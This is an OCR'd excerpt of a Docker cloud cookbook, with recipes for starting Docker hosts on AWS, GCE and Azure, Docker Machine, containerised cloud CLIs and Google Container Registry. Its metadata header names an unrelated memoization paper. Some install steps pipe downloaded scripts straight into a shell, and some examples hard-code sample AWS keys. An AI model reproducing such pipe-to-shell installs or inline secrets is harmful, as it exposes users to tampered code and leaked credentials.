{"Source-Url": "http://www.researchgate.net/profile/Joao_Cachopo/publication/221302965_Memoization_of_methods_using_software_transactional_memory_to_track_internal_state_dependencies/links/0fcfd514205733cc68000000.pdf", "len_cl100k_base": 12587, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 32278, "total-output-tokens": 14039, "length": "2e13", "weborganizer": {"__label__adult": 0.0003440380096435547, "__label__art_design": 0.00021409988403320312, "__label__crime_law": 0.0002694129943847656, "__label__education_jobs": 0.0004138946533203125, "__label__entertainment": 4.214048385620117e-05, "__label__fashion_beauty": 0.0001283884048461914, "__label__finance_business": 0.0001316070556640625, "__label__food_dining": 0.0002567768096923828, "__label__games": 0.0004243850708007813, "__label__hardware": 0.0005230903625488281, "__label__health": 0.00029468536376953125, "__label__history": 0.00016260147094726562, "__label__home_hobbies": 5.6743621826171875e-05, "__label__industrial": 0.00023305416107177737, "__label__literature": 0.0001653432846069336, "__label__politics": 0.00020575523376464844, "__label__religion": 0.0003495216369628906, "__label__science_tech": 0.00328826904296875, "__label__social_life": 6.020069122314453e-05, "__label__software": 0.0035991668701171875, "__label__software_dev": 0.98779296875, "__label__sports_fitness": 0.00026416778564453125, "__label__transportation": 0.0003886222839355469, "__label__travel": 0.0001876354217529297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 64204, 0.02329]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 64204, 0.318]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 64204, 0.90309]], "google_gemma-3-12b-it_contains_pii": [[0, 5157, false], [5157, 11921, null], [11921, 18554, null], [18554, 25475, null], [25475, 30598, null], [30598, 37632, null], [37632, 45378, null], [45378, 52002, null], [52002, 56969, null], [56969, 64204, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5157, true], [5157, 11921, null], [11921, 18554, null], [18554, 25475, null], [25475, 30598, null], [30598, 37632, null], [37632, 45378, null], [45378, 52002, null], [52002, 56969, null], [56969, 64204, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 64204, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 64204, null]], "pdf_page_numbers": [[0, 5157, 1], [5157, 11921, 2], [11921, 18554, 3], [18554, 25475, 4], [25475, 30598, 5], [30598, 37632, 6], [37632, 45378, 7], [45378, 52002, 8], [52002, 56969, 9], [56969, 64204, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 64204, 0.07292]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
f1340d6b1effb2c8f52cc16da76938873f98c171
Docker in the Cloud Recipes for AWS, Azure, Google, and More Sébastien Goasguen Short. Smart. Seriously useful. Free ebooks and reports from O’Reilly at oreil.ly/ops-perf HTTP/2 A New Excerpt from High Performance Browser Networking Ilya Grigorik DevOps in Practice J. Paul Reed Docker Security Adrian Moust DevOps for Finance Jim Bird Kubernetes David K. Remsen Get even more insights from industry experts and stay current with the latest developments in web operations, DevOps, and web performance with free ebooks and reports from O’Reilly. ©2016 O'Reilly Media, Inc. The O'Reilly logo is a registered trademark of O'Reilly Media, Inc. D1710 # Table of Contents **Docker in the Cloud.** <table> <thead> <tr> <th>Section</th> <th>Page</th> </tr> </thead> <tbody> <tr> <td>Introduction</td> <td>1</td> </tr> <tr> <td>Starting a Docker Host on AWS EC2</td> <td>3</td> </tr> <tr> <td>Starting a Docker Host on Google GCE</td> <td>7</td> </tr> <tr> <td>Starting a Docker Host on Microsoft Azure</td> <td>9</td> </tr> <tr> <td>Introducing Docker Machine to Create Docker Hosts in the Cloud</td> <td>11</td> </tr> <tr> <td>Starting a Docker Host on AWS Using Docker Machine</td> <td>16</td> </tr> <tr> <td>Starting a Docker Host on Azure with Docker Machine</td> <td>19</td> </tr> <tr> <td>Running a Cloud Provider CLI in a Docker Container</td> <td>21</td> </tr> <tr> <td>Using Google Container Registry to Store Your Docker Images</td> <td>23</td> </tr> <tr> <td>Using Kubernetes in the Cloud via GKE</td> <td>26</td> </tr> <tr> <td>Setting Up to Use the EC2 Container Service</td> <td>30</td> </tr> <tr> <td>Creating an ECS Cluster</td> <td>33</td> </tr> <tr> <td>Starting Docker Containers on an ECS Cluster</td> <td>37</td> </tr> </tbody> </table> Introduction With the advent of public and private clouds, enterprises have moved an increasing number of workloads to the clouds. A significant portion of IT infrastructure is now provisioned on public clouds like Amazon Web Services (AWS), Google Compute Engine (GCE), and Microsoft Azure (Azure). In addition, companies have deployed private clouds to provide a self-service infrastructure for IT needs. Although Docker, like any software, runs on bare-metal servers, running a Docker host in a public or private cloud (i.e., on virtual machines) and orchestrating containers started on those hosts is going to be a critical part of new IT infrastructure needs. Debating whether running containers on virtual machines makes sense or not is largely out of scope for this mini-book. Figure 1-1 depicts a simple setup where you are accessing a remote Docker host in the cloud using your local Docker client. This is made possible by the remote Docker Engine API which can be setup with TLS authentication. We will see how this scenario is fully automated with the use of docker-machine. In this book we show you how to use public clouds to create Docker hosts, and we also introduce some container-based services that have reached general availability recently: the AWS container service and the Google container engine. Both services mark a new trend in public cloud providers who need to embrace Docker as a new way to package, deploy and manage distributed applications. We can expect more services like these to come out and extend the capabilities of Docker and containers in general. This book covers the top three public clouds (i.e., AWS, GCE, and Azure) and some of the Docker services they offer. If you have never used a public cloud, now is the time. You will see how to use the CLI of these clouds to start instances and install Docker in “Starting a Docker Host on AWS EC2” on page 3, “Starting a Docker Host on Google GCE” on page 7, and “Starting a Docker Host on Microsoft Azure” on page 9. To avoid installing the CLI we show you a trick in “Running a Cloud Provider CLI in a Docker Container” on page 21, where all the cloud clients can actually run in a container. While Docker Machine (see “Introducing Docker Machine to Create Docker Hosts in the Cloud” on page 11) will ultimately remove the need to use these provider CLIs, learning how to start instances with them will help you use the other Docker-related cloud services. That being said, in “Starting a Docker Host on AWS Using Docker Machine” on page 16 we show you how to start a Docker host in AWS EC2 using docker-machine and we do the same with Azure in “Starting a Docker Host on Azure with Docker Machine” on page 19. We then present some Docker-related services on GCE and EC2. First on GCE, we look at the Google container registry, a hosted Docker registry that you can use with your Google account. It works like the Docker Hub but has the advantage of leveraging Google’s authorization system to give access to your images to team members and the public if you want to. The hosted Kubernetes service, Google Container Engine (i.e., GKE), is presented in “Using Kubernetes in the Cloud via GKE” on page 26. GKE is the fastest way to experiment with Kubernetes if you already have a Google cloud account. To finish this chapter, we look at two services on AWS that allow you to run your containers. First we look at the Amazon Container Service (i.e., ECS) in “Setting Up to Use the EC2 Container Service” on page 30. We show you how to create an ECS cluster in “Creating an ECS Cluster” on page 33 and how to run containers by defining tasks in “Starting Docker Containers on an ECS Cluster” on page 37. AWS, GCE, and Azure are the recognized top-three public cloud providers in the world. However, Docker can be installed on any public cloud where you can run an instance based on a Linux distribution supported by Docker (e.g., Ubuntu, CentOS, CoreOS). For instance DigitalOcean and Exoscale also support Docker in a seamless fashion. Starting a Docker Host on AWS EC2 Problem You want to start a VM instance on the AWS EC2 cloud and use it as a Docker host. Solution Although you can start an instance and install Docker in it via the EC2 web console, you will use the AWS command-line interface (CLI). First, you should have created an account on AWS and obtained a set of API keys. In the AWS web console, select your account name at the top right of the page and go to the Security Credentials page, shown in Figure 1-2. You will be able to create a new access key. The secret key corresponding to this new access key will be given to you only once, so make sure that you store it securely. You can then install the AWS CLI and configure it to use your newly generated keys. Select an AWS region where you want to start your instances by default. The AWS CLI, `aws`, is a Python package that can be installed via the Python Package Index (pip). For example, on Ubuntu: ``` $ sudo apt-get -y install python-pip $ sudo pip install awscli $ aws configure AWS Access Key ID [**********n-mg]: AKIAIEFDGHQRTW3MNQ AWS Secret Access Key [*********UjEg]: b4pWY69Qd+Yg1qo22wC Default region name [eu-east-1]: eu-west-1 Default output format [table]: $ aws --version aws-cli/1.7.4 Python/2.7.6 Linux/3.13.0-32-generic ``` To access your instance via `ssh`, you need to have an SSH key pair set up in EC2. Create a key pair via the CLI, copy the returned private key into a file in your `~/.ssh` folder, and make that file readable and writable only by you. Verify that the key has been created, either via the CLI or by checking the web console: ``` $ aws ec2 create-key-pair --key-name cookbook $ vi ~/.ssh/id_rsa_cookbook $ chmod 600 ~/.ssh/id_rsa_cookbook $ aws ec2 describe-key-pairs ``` ``` +----------------------------------------------+-----------+ || KeyPairs || +----------------------------------------------+-----------+ || KeyFingerprint | KeyName || ``` Figure 1-2. AWS Security Credentials page You are ready to start an instance on EC2. The standard Linux images from AWS now contain a Docker repository. Hence when starting an EC2 instance from an Amazon Linux AMI, you will be one step away from running Docker (``sudo yum install docker``): TIP Use a paravirtualized (PV) Amazon Linux AMI, so that you can use a `t1.micro` instance type. In addition, the default security group allows you to connect via `ssh`, so you do not need to create any additional rules in the security group if you only need to `ssh` to it. ``` $ aws ec2 run-instances --image-id ami-7b3db00c --count 1 --instance-type t1.micro --key-name cookbook $ aws ec2 describe-instances $ ssh -i ~/.ssh/id_rsa_cookbook ec2-user@54.194.31.39 Warning: Permanently added '54.194.31.39' (RSA) to the list of known hosts. [ec2-user@ip-172-31-8-174 ~]$ Install the Docker package, start the Docker daemon, and verify that the Docker CLI is working: [ec2-user@ip-172-31-8-174 ~]$ sudo yum update [ec2-user@ip-172-31-8-174 ~]$ sudo yum install docker [ec2-user@ip-172-31-8-174 ~]$ sudo service docker start [ec2-user@ip-172-31-8-174 ~]$ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED ... Do not forget to terminate the instance or you might get charged for it: ``` $ aws ec2 terminate-instances --instance-ids <instance id> ``` Discussion You spent some time in this recipe creating API access keys and installing the CLI. Hopefully, you see the ease of creating Docker hosts in AWS. The standard AMIs are now ready to go to install Docker in two commands. The Amazon Linux AMI also contains cloud-init, which has become the standard for configuring cloud instances at boot time. This allows you to pass user data at instance creation. cloud-init parses the content of the user data and executes the commands. Using the AWS CLI, you can pass some user data to automatically install Docker. The small downside is that it needs to be base64-encoded. Create a small bash script with the two commands from earlier: ```bash #!/bin/bash yum -y install docker service docker start ``` Encode this script and pass it to the instance creation command: ```bash $ udata="$(cat docker.sh | base64 )" $ aws ec2 run-instances --image-id ami-7b3db00c \ --count 1 \ --instance-type t1.micro \ --key-name cookbook \ --user-data $udata $ ssh -i ~/.ssh/id_rsa_cookbook ec2-user@<public_IP_instance> $ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED ... ``` With the Docker daemon running, if you wanted to access it remotely, you would need to set up TLS access, and open port 2376 in your security group. Using this CLI is not Docker-specific. This CLI gives you access to the complete set of AWS APIs. However, using it to start instances and install Docker in them significantly streamlines the provisioning of Docker hosts. See Also - Installing the AWS CLI - Configuring the AWS CLI - Launching an instance via the AWS CLI Starting a Docker Host on Google GCE Problem You want to start a VM instance on the Google GCE cloud and use it as a Docker host. Solution Install the gcloud CLI (you will need to answer a few questions), and then log in to the Google cloud (You will need to have registered before). If the CLI can open a browser, you will be redirected to a web page and asked to sign in and accept the terms of use. If your terminal cannot launch a browser, you will be given a URL to open in a browser. This will give you an access token to enter at the command prompt: ```bash $ curl https://sdk.cloud.google.com | bash $ gcloud auth login Your browser has been opened to visit: https://accounts.google.com/o/oauth2/auth?redirect_uri=... ... $ gcloud compute zones list NAME REGION STATUS asia-east1-c asia-east1 UP asia-east1-a asia-east1 UP asia-east1-b asia-east1 UP europe-west1-b europe-west1 UP europe-west1-c europe-west1 UP us-central1-f us-central1 UP us-central1-b us-central1 UP us-central1-a us-central1 UP ``` If you have not set up a project, set one up in the web console. Projects allow you to manage team members and assign specific permission to each member. It is roughly equivalent to the Amazon Identity and Access Management (IAM) service. To start instances, it is handy to set some defaults for the region and zone that you would prefer to use (even though deploying a robust system in the cloud will involve instances in multiple regions and zones). To do this, use the gcloud config set command. For example: ```bash $ gcloud config set compute/region europe-west1 $ gcloud config set compute/zone europe-west1-c $ gcloud config list --all ``` To start an instance, you need an image name and an instance type. Then the `gcloud` tool does the rest: ```bash $ gcloud compute instances create cookbook \ --machine-type n1-standard-1 \ --image ubuntu-14-04 \ --metadata startup-script="\n "sudo wget -qO- https://get.docker.com/ | sh" ... $ gcloud compute ssh cookbook sebgoa@cookbook:~$ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED ... ... $ gcloud compute instances delete cookbook ``` In this example, you created an Ubuntu 14.04 instance, of machine type `n1-standard-1` and passed metadata specifying that it was to be used as a start-up script. The bash command specified installed the `docker` package from the Docker Inc. repository. This led to a running instance with Docker running. The GCE metadata is relatively equivalent to the AWS EC2 user data and is processed by `cloud-init` in the instance. **Discussion** If you list the images available in a zone, you will see that some are interesting for Docker-specific tasks: ```bash $ gcloud compute images list NAME PROJECT ALIAS ... ... centos-7... centos-cloud centos-7 READY ... coreos-alpha-921... coreos-cloud READY ... container-vm... google-containers container-vm READY ... ubuntu-1404-trusty... ubuntu-os-cloud ubuntu-14-04 READY ... ``` Indeed, GCE provides CoreOS images, as well as container VMs. CoreOS is discussed in the Docker cookbook. Container VMs are Debian 7–based instances that contain the Docker daemon and the Kubernetes kubeblet; they are discussed in the full version of the Docker in the Cloud chapter. Kubernetes is discussed in chapter 5 of the Docker cookbook. If you want to start a CoreOS instance, you can use the image alias. You do not need to specify any metadata to install Docker: ```bash $ gcloud compute instances create cookbook --machine-type n1-standard-1 --image coreos $ gcloud compute ssh cookbook ... CoreOS (stable) sebgoa@cookbook ~ $ docker ps CONTAINER ID IMAGE COMMAND CREATED ... ``` Using the `gcloud` CLI is not Docker-specific. This CLI gives you access to the complete set of GCE APIs. However, using it to start instances and install Docker in them significantly streamlines the provisioning of Docker hosts. **Starting a Docker Host on Microsoft Azure** **Problem** You want to start a VM instance on the Microsoft Azure cloud and use it as a Docker host. **Solution** First you need an account on Azure. If you do not want to use the Azure portal, you need to install the Azure CLI. On a fresh Ubuntu 14.04 machine, you would do this: ```bash $ sudo apt-get update $ sudo apt-get -y install nodejs-legacy $ sudo apt-get -y install npm $ sudo npm install -g azure-cli $ azure --v 0.8.14 ``` Then you need to set up your account for authentication from the CLI. Several methods are available. One is to download your account settings from the portal and import them on the machine you are using the CLI from: ```bash $ azure account download $ azure account import ~/Downloads/Free\Trial-2-5-2015-credentials.publishsettings $ azure account list ``` You are now ready to use the Azure CLI to start VM instances. Pick a location and an image: ``` $ azure vm image list | grep Ubuntu $ azure vm location list ``` ``` info: Executing command vm location list + Getting locations data: Name data: ---------------- data: West Europe data: North Europe data: East US 2 data: Central US data: South Central US data: West US data: East US data: Southeast Asia data: East Asia data: Japan West info: vm location list command OK ``` To create an instance with ssh access using password authentication, use the `azure vm create` command: ``` $ azure vm create cookbook --ssh=22 \\ --password #@$#%#@$ \\ --userName cookbook \\ --location "West Europe" \\ b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-14_04_1-LTS \\ -amd64-server-20150123-en-us-30GB ``` ``` ... $ azure vm list ... data: Name Status Location ... IP Address data: -------- --------- ----------- ... ---------- data: cookbook ReadyRole West Europe ... 100.91.96.137 info: vm list command OK ``` You can then ssh to the instance and set up Docker normally. **Discussion** The Azure CLI is still under active development. The source can be found on GitHub, and a Docker Machine driver is available. The Azure CLI also allows you to create a Docker host automatically by using the `azure vm docker create` command: ``` $ azure vm docker create goasguen -l "West Europe" \\ b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-14_04_1-LTS-amd64- ``` The host started will automatically have the Docker daemon running, and you can connect to it by using the Docker client and a TLS connection: ``` $ docker --tls -H tcp://goasguen.cloudapp.net:4243 ps CONTAINER ID IMAGE COMMAND CREATED STATUS .... $ docker --tls -H tcp://goasguen.cloudapp.net:4243 images REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE ``` Using this CLI is not Docker-specific. This CLI gives you access to the complete set of Azure APIs. However, using it to start instances and install Docker in them significantly streamlines the provisioning of Docker hosts. **See Also** - The Azure command-line interface - Starting a CoreOS instance on Azure - Using Docker Machine with Azure **Introducing Docker Machine to Create Docker Hosts in the Cloud** **Problem** You do not want to install the Docker daemon locally using Vagrant or the Docker toolbox. Instead, you would like to use a Docker host in the cloud (e.g., AWS, Azure, DigitalOcean, Exoscale or GCE) and connect to it seamlessly using the local Docker client. **Solution** Use *Docker Machine* to start a cloud instance in your public cloud of choice. *Docker Machine* is a client-side tool that you run on your local host that allows you to start a server in a remote public cloud and use it as a Docker host as if it were local. *Machine* will automatically install Docker and set up TLS for secure communication. You will then be able to use the cloud instance as your Docker host and use it from a local Docker client. --- *Docker Machine* beta was announced on February 26, 2015. Official documentation is now available on the Docker website. The source code is available on GitHub. Let’s get started. *Machine* currently supports VirtualBox, DigitalOcean, AWS, Azure, GCE, and a few other providers. This recipe uses DigitalOcean, so if you want to follow along step by step, you will need an account on DigitalOcean. Once you have an account, do not create a droplet through the DigitalOcean UI. Instead, generate an API access token for using Docker Machine. This token will need to be both a *read* and a *write* token so that Machine can upload a public SSH key (Figure 1-3). Set an environment variable `DIGITALOCEAN_ACCESS_TOKEN` in your local computer shell that defines the token you created. --- Machine will upload an SSH key to your cloud account. Make sure that your access tokens or API keys give you the privileges necessary to create a key. You are almost set. You just need to download the *docker-machine* binary. Go to the documentation site and choose the correct binary for your local computer architecture. For example, on OS X: ``` $ sudo curl -L https://github.com/docker/machine/releases/download/v0.5.6/docker-machine_darwin-amd64 $ mv docker-machine_darwin-amd64 docker-machine $ chmod +x docker-machine $ ./docker-machine --version docker-machine version 0.5.6 ``` With the environment variable `DIGITALOCEAN_ACCESS_TOKEN` set, you can create your remote Docker host: ``` $ ./docker-machine create -d digitalocean foobar Running pre-create checks... Creating machine... (foobar) Creating SSH key... (foobar) Creating Digital Ocean droplet... ...To see how to connect Docker to this machine, run: docker-machine env foobar ``` If you go back to your DigitalOcean dashboard, you will see that an SSH key has been created, as well as a new droplet (see Figures 1-4 and 1-5). To configure your local Docker client to use this remote Docker host, you execute the command that was listed in the output of creating the machine: ```bash $ ./docker-machine env foobar export DOCKER_TLS_VERIFY="1" export DOCKER_HOST="tcp://104.131.102.224:2376" export DOCKER_CERT_PATH="/Users/.docker/.../machines/foobar" export DOCKER_MACHINE_NAME="foobar" # Run this command to configure your shell: # eval $(./docker-machine env foobar) $ eval "$(./docker-machine env foobar)" $ docker ps CONTAINER ID IMAGE COMMAND CREATED ... Enjoy Docker running remotely on a DigitalOcean droplet created with Docker Machine. **Discussion** If not specified at the command line, Machine will look for `DIGITALOCEAN_IMAGE`, `DIGITALOCEAN_REGION`, and `DIGITALOCEAN_SIZE` environment variables. By default, they are set to `docker`, `nyc3`, and `512mb`, respectively. The `docker-machine` binary lets you create multiple machines, on multiple providers. You also have the basic management capabilities: `start`, `stop`, `rm`, and so forth: ```bash $ ./docker-machine ... Commands: active Print which machine is active config Print the connection config for machine create Create a machine env Display the commands to set up ... ``` inspect Inspect information about a machine ip Get the IP address of a machine kill Kill a machine ls List machines regenerate-certs Regenerate TLS... restart Restart a machine rm Remove a machine ssh Log into or run a command... scp Copy files between machines start Start a machine status Get the status of a machine stop Stop a machine upgrade Upgrade a machine to the latest version of Docker url Get the URL of a machine version Show the Docker Machine version ... help Shows a list of commands or ... For instance, you can list the machine you created previously, obtain its IP address, and even connect to it via SSH: $ ./docker-machine ls NAME ... DRIVER STATE URL foobar digitalocean Running tcp://104.131.102.224:2376 $ ./docker-machine ip foobar 104.131.102.224 $ ./docker-machine ssh foobar Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-57-generic x86_64) ... Last login: Mon Mar 16 09:02:13 2015 from ... root@foobar:~# Before you are finished with this recipe, do not forget to delete the machine you created: $ ./docker-machine rm foobar See Also • Official documentation Starting a Docker Host on AWS Using Docker Machine Problem You understand how to use the AWS CLI to start an instance in the cloud and know how to install Docker (see “Starting a Docker Host on AWS EC2” on page 3). But you would like to use a streamlined process integrated with the Docker user experience. Solution Use Docker Machine and its AWS EC2 driver. Download the release candidate binaries for Docker Machine. Set some environment variables so that Docker Machine knows your AWS API keys and your default VPC in which to start the Docker host. Then use Docker Machine to start the instance. Docker automatically sets up a TLS connection, and you can use this remote Docker host started in AWS. On a 64-bit Linux machine, do the following: ``` $ sudo su # curl -L https://github.com/docker/machine/releases/download/v0.5.6/docker-machine_linux-amd64 > /usr/local/bin/docker-machine # chmod +x docker-machine # exit $ export AWS_ACCESS_KEY_ID=<your AWS access key> $ export AWS_SECRET_ACCESS_KEY_ID=<your AWS secret key> $ export AWS_VPC_ID=<the VPC ID you want to use> $ docker-machine create -d amazonec2 cookbook Running pre-create checks... Creating machine... (cookbook) Launching instance... ... To see how to connect Docker to this machine, run: docker-machine env cookbook ``` Once the machine has been created, you can use your local Docker client to communicate with it. Do not forget to kill the machine after you are finished: ``` $ eval "$(docker-machine env cookbook)" $ docker ps CONTAINER ID IMAGE COMMAND CREATED ... $ docker-machine ls ``` NAME ... DRIVER STATE URL cookbook ... amazonec2 Running tcp://<IP_Machine_AWS>:2376 $ docker-machine rm cookbook You can manage your machines directly from the Docker Machine CLI: $ docker-machine -h ... COMMANDS: active Get or set the active machine create Create a machine config Print the connection config for machine inspect Inspect information about a machine ip Get the IP address of a machine kill Kill a machine ls List machines restart Restart a machine rm Remove a machine env Display the commands to set up the environment for the Docker client ssh Log into or run a command on a machine with SSH start Start a machine stop Stop a machine upgrade Upgrade a machine to the latest version of Docker url Get the URL of a machine help, h Shows a list of commands or help for one command Discussion Docker Machine contains drivers for several cloud providers. We already showcased the Digital Ocean driver (see “Introducing Docker Machine to Create Docker Hosts in the Cloud” on page 11), and you can see how to use it for Azure in “Starting a Docker Host on Azure with Docker Machine” on page 19. The AWS driver takes several command-line options to set your keys, VPC, key pair, image, and instance type. You can set them up as environment variables as you did previously or directly on the machine command line: $ docker-machine create -h ... OPTIONS: --amazonec2-access-key AWS Access Key [AWS_ACCESS_KEY_ID] --amazonec2-ami Finally, machine will create an SSH key pair and a security group for you. The security group will open traffic on port 2376 to allow communications over TLS from a Docker client. Figure 1-6 shows the rules of the security group in the AWS console. ![Figure 1-6. Security group for machine](image) Starting a Docker Host on Azure with Docker Machine Problem You know how to start a Docker host on Azure by using the Azure CLI, but you would like to unify the way you start Docker hosts in multiple public clouds by using Docker Machine. Solution Use the Docker Machine Azure driver. In Figure 1-3, you saw how to use Docker Machine to start a Docker host on DigitalOcean. The same thing can be done on Microsoft Azure. You will need a valid subscription to Azure. You need to download the docker-machine binary. Go to the documentation site and choose the correct binary for your local computer architecture. For example, on OS X: ``` $ wget https://github.com/docker/machine/releases/download/v0.5.6/docker-machine_darwin-amd64 $ mv docker-machine_darwin-amd64 docker-machine $ chmod +x docker-machine $ ./docker-machine --version ``` docker-machine version 0.5.6 With a valid Azure subscription, create an X.509 certificate and upload it through the Azure portal. You can create the certificate with the following commands: ``` $ openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout mycert.pem -out mycert.pem $ openssl pkcs12 -export -out mycert.pfx -in mycert.pem -name "My Certificate" $ openssl x509 -inform pem -in mycert.pem -outform der -out mycert.cer ``` Upload mycert.cer and define the following environment variables: ``` $ export AZURE_SUBSCRIPTION_ID=<UID of your subscription> $ export AZURE_SUBSCRIPTION_CERT=mycert.pem ``` You can then use docker-machine and set your local Docker client to use this remote Docker daemon: ``` $ ./docker-machine create -d azure goasguen-foobar Creating Azure machine... Waiting for SSH... ``` "goasguen-foobar" has been created and is now the active machine. $ ./docker-machine ls NAME DRIVER ... URL goasguen-foobar azure ... tcp://goasguen-foobar.cloudapp.net:2376 In this example, goasguen-foobar is the name that I gave to my Docker machine. This needs to be a globally unique name. Chances are that names like foobar and test have already been taken. Discussion With your local Docker client set up to use the remote Docker daemon running in this Azure virtual machine, you can pull images from your favorite registries and start containers. For example, let's start an Nginx container: $ docker pull nginx $ docker run -d -p 80:80 nginx To expose port 80 of this remote host in Azure, you need to add an endpoint to the VM that was created. Head over to the Azure portal, select the VM (here, goasguen-foobar), and add an endpoint for the HTTP request, as in Figure 1-7. Once the endpoint is created, you can access Nginx at http://<unique_name>.cloudapp.net. ![Figure 1-7. Azure endpoint for a virtual machine](image) See Also - Docker Machine Azure driver documentation Running a Cloud Provider CLI in a Docker Container Problem You want to take advantage of containers and run your cloud provider CLI of choice within a container. This gives you more portability options and avoids having to install the CLI from scratch. You just need to download a container image from the Docker Hub. Solution For the Google GCE CLI, there is a public image maintained by Google. Download the image via `docker pull` and run your GCE commands through interactive ephemeral containers. For example: ``` $ docker pull google/cloud-sdk $ docker images | grep google google/cloud-sdk latest a7e7bcdfdc16 ... ``` You can then log in and issue commands as described in “Starting a Docker Host on Google GCE” on page 7. The only difference is that the CLI is running within containers. The login command is issued through a named container. That named container is used as a data volume container (i.e., `--volumes-from cloud-config`) in subsequent CLI calls. This allows you to use the authorization token that is stored in it: ``` $ docker run -t -i --name gcloud-config google/cloud-sdk gcloud auth login ``` Go to the following link in your browser: ``` ... ``` ``` $ docker run --rm -ti --volumes-from gcloud-config google/cloud-sdk gcloud compute zones list ``` <table> <thead> <tr> <th>NAME</th> <th>REGION</th> <th>STATUS</th> </tr> </thead> <tbody> <tr> <td>asia-east1-c</td> <td>asia-east1</td> <td>UP</td> </tr> <tr> <td>asia-east1-a</td> <td>asia-east1</td> <td>UP</td> </tr> </tbody> </table> Using an alias makes things even better: ```bash $ alias magic='docker run --rm \ -ti \ --volumes-from gcloud-config \ google/cloud-sdk gcloud' ``` ```bash $ magic compute zones list ``` --- Discussion A similar process can be used for AWS. If you search for an `awscli` image on Docker Hub, you will see several options. The Dockerfile provided shows you how the image was constructed and the CLI installed within the image. If you take the `nathanleclaire/awscli` image, you notice that no volumes are mounted to keep the credentials from container to container. Hence you need to pass the AWS access keys as environment variables when you launch a container: ```bash $ docker pull nathanleclaire/awscli $ docker run --rm \ -ti \ -e AWS_ACCESS_KEY_ID="AKIAIUCASDLGFIGDFGS" \ -e AWS_SECRET_ACCESS_KEY="HwQdNnAIqQERfrgot" \ nathanleclaire/awscli \ --region eu-west-1 \ --output=table \ ec2 describe-key-pairs ``` ``` | DescribeKeyPairs | | | ----------------- | | +-----------------+ | || -----------------+ | || KeyPairs | | | +-----------------+ | || KeyFingerprint | KeyName | | +-----------------+ ``` Also notice that `aws` was set up as an entry point in this image. Therefore, there you don't need to specify it and should only pass arguments to it. **TIP** You can build your own AWS CLI image that allows you to handle API keys more easily. ### See Also - Official documentation on the containerized Google SDK ### Using Google Container Registry to Store Your Docker Images #### Problem You have used a Docker private registry hosted on your own infrastructure but you would like to take advantage of a hosted service. Specifically, you would like to take advantage of the newly announced Google container registry. **NOTE** Other hosted private registry solutions exist, including Docker Hub Enterprise and Quay.io. This recipe does not represent an endorsement of one versus another. #### Solution If you have not done so yet, sign up on the Google Cloud Platform. Then download the Google Cloud CLI and create a project (see “Starting a Docker Host on Google GCE” on page 7). Make sure that you update your `gcloud` CLI on your Docker host to load the preview components. You will have access to `gcloud docker`, which is a wrapper around the `docker` client: ``` $ gcloud components update $ gcloud docker help Usage: docker [OPTIONS] COMMAND [arg...] ``` A self-sufficient runtime for Linux containers. This example uses a cookbook project on Google Cloud with the project ID `sylvan-plane-862`. Your project name and project ID will differ. As an example, on the Docker host that we are using locally, we have a `busybox` image that we want to upload to the Google Container Registry (GCR). You need to tag the image you want to push to the GCR so that it follows the namespace naming convention of the GCR (i.e., `gcr.io/project_id/image_name`). You can then upload the image with `gcloud docker push`: ```bash $ docker images | grep busybox busybox latest a9eb17255234 8 months ago 2.433 MB $ docker tag busybox gcr.io/sylvan_plane_862/busybox $ gcloud docker push gcr.io/sylvan_plane_862/busybox The push refers to a repository [gcr.io/sylvan_plane_862/busybox] (len: 1) Sending image list Pushing repository gcr.io/sylvan_plane_862/busybox (1 tags) 511136ea3c5a: Image successfully pushed 42eed7f1bf2a: Image successfully pushed 120e218dd395: Image successfully pushed a9eb17255234: Image successfully pushed Pushing tag for rev [a9eb17255234] on \ {https://gcr.io/v1/repositories/sylvan_plane_862/busybox/tags/latest} ``` The naming convention of the GCR namespace is such that if you have dashes in your project ID, you need to replace them with underscores. If you navigate to your storage browser in your Google Developers console, you will see that a new bucket has been created and that all the layers making your image have been uploaded (see Figure 1-8). Discussion Automatically, Google compute instances that you started in the same project that you used to tag the image, will have the right privileges to pull that image. If you want other people to be able to pull that image, you need to add them as members to that project. You can set your project by default with `gcloud config set project <project_id>` so you do not have to specify it on subsequent `gcloud` commands. Let’s start an instance in GCE, `ssh` to it, and pull the `busybox` image from GCR: ```bash $ gcloud compute instances create cookbook-gce \ --image container-vm \ --zone europe-west1-c \ --machine-type f1-micro $ gcloud compute ssh cookbook-gce Updated [https://www.googleapis.com/compute/v1/projects/sylvan-plane-862]. ... $ sudo gcloud docker pull gcr.io/sylvan_plane_862/busybox Pulling repository gcr.io/sylvan_plane_862/busybox a9eb17255234: Download complete 511136ea3c5a: Download complete 42eed7f1bf2a: Download complete 120e218dd395: Download complete Status: Downloaded newer image for 